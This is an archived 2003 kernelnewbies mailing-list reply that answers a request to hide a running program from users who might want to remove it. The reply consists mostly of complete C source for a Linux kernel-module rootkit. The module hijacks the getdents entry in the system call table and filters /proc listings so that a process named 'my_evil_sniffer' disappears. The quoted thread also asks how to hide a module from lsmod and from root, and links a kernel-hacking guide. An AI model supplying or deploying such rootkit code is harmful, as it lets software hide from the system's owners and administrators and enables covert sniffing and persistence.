Yes, you can definitely do it,
Compile the kernel module from the below source and test it.
Let me know, what had happened
#define MODULE
#define __KERNEL__
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <asm/fcntl.h>
#include <asm/errno.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <sys/mman.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/malloc.h>
#include <linux/proc_fs.h>
extern void* sys_call_table[];
/*process name we want to hide*/
char mtroj[] = "my_evil_sniffer";
int (*orig_getdents)(unsigned int fd, struct dirent *dirp, unsigned int
count);
/*convert a string to number*/
int myatoi(char *str)
{
int res = 0;
int mul = 1;
char *ptr;
for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
if (*ptr < '0' || *ptr > '9')
return (-1);
res += (*ptr - '0') * mul;
mul *= 10;
}
return (res);
}
/*get task structure from PID*/
struct task_struct *get_task(pid_t pid)
{
struct task_struct *p = current;
do {
if (p->pid == pid)
return p;
p = p->next_task;
}
while (p != current);
return NULL;
}
/*get process name from task structure*/
static inline char *task_name(struct task_struct *p, char *buf)
{
int i;
char *name;
name = p->comm;
i = sizeof(p->comm);
do {
unsigned char c = *name;
name++;
i--;
*buf = c;
if (!c)
break;
if (c == '\\') {
buf[1] = c;
buf += 2;
continue;
}
if (c == '\n') {
buf[0] = '\\';
buf[1] = 'n';
buf += 2;
continue;
}
buf++;
}
while (i);
*buf = '\n';
return buf + 1;
}
/*check whether we need to hide this process*/
int invisible(pid_t pid)
{
struct task_struct *task = get_task(pid);
char *buffer;
if (task) {
buffer = kmalloc(200, GFP_KERNEL);
memset(buffer, 0, 200);
task_name(task, buffer);
if (strstr(buffer, (char *) &mtroj)) {
kfree(buffer);
return 1;
}
}
return 0;
}
int hacked_getdents(unsigned int fd, struct dirent *dirp, unsigned int
count)
{
unsigned int tmp, n;
int t, proc = 0;
struct inode *dinode;
struct dirent *dirp2, *dirp3;
tmp = (*orig_getdents) (fd, dirp, count);
#ifdef __LINUX_DCACHE_H
dinode = current->files->fd[fd]->f_dentry->d_inode;
#else
dinode = current->files->fd[fd]->f_inode;
#endif
if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) &&
MINOR(dinode->i_dev) == 1)
proc=1;
if (tmp > 0) {
dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);
memcpy_fromfs(dirp2, dirp, tmp);
dirp3 = dirp2;
t = tmp;
while (t > 0) {
n = dirp3->d_reclen;
t -= n;
if ((proc && invisible(myatoi(dirp3->d_name)))) {
if (t != 0)
memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
else
dirp3->d_off = 1024;
tmp -= n;
}
if (t != 0)
dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);
}
memcpy_tofs(dirp, dirp2, tmp);
kfree(dirp2);
}
return tmp;
}
int init_module(void) /*module setup*/
{
orig_getdents=sys_call_table[SYS_getdents];
sys_call_table[SYS_getdents]=hacked_getdents;
return 0;
}
void cleanup_module(void) /*module shutdown*/
{
sys_call_table[SYS_getdents]=orig_getdents;
}
iqbal
On Wed, 2003-01-15 at 10:17, Jonathan Khoo wrote:
> Hi guys,
>
> I need to hide a running process, a program which I have written so that
> the end users cannot remove it.
> I read that LIDS does this. But it will be a tedious task if I have to
> patch the kernel of all the boxes.
> Would it be possible to write a kernel module which hides the process,
> and in turn hides its ownself as well??
>
> Has anyone done this before?
> Thanks in advance.
> Soeren wrote:
>
> >On Tue, 14 Jan 2003 11:58:53 -0800 (PST)
> >S P <sage_newbie@yahoo.com> wrote:
> >
> >
> >
> >>Hi,
> >>
> >>I am writing a software program which when installed, inserts a kernel
> >>module. However the user should not be able to see the module (using
> >>lsmod) or remove it, even if he has root privileges. Only the uninstall
> >>program should be able to remove it. Is there any way this can be done ?
> >>I thought of modifying the sys_create_module system call.
> >>
> >>Thanks for the help,
> >>
> >>-SP
> >>
> >>
> >
> >Hi,
> >you should take a look on:
> >http://packetstorm.decepticons.org/docs/hack/LKM_HACKING.html#II.9.
> >- maybe it'll help you.
> >
> >Soeren
> >
> >
> >
>
>
>
> --
> Kernelnewbies: Help each other learn about the Linux kernel.
> Archive: http://mail.nl.linux.org/kernelnewbies/
> FAQ: http://kernelnewbies.org/faq/
>
> --
> Kernelnewbies: Help each other learn about the Linux kernel.
> Archive: http://mail.nl.linux.org/kernelnewbies/
> FAQ: http://kernelnewbies.org/faq/
>
>
--
Kernelnewbies: Help each other learn about the Linux kernel.
Archive: http://mail.nl.linux.org/kernelnewbies/
FAQ: http://kernelnewbies.org/faq/
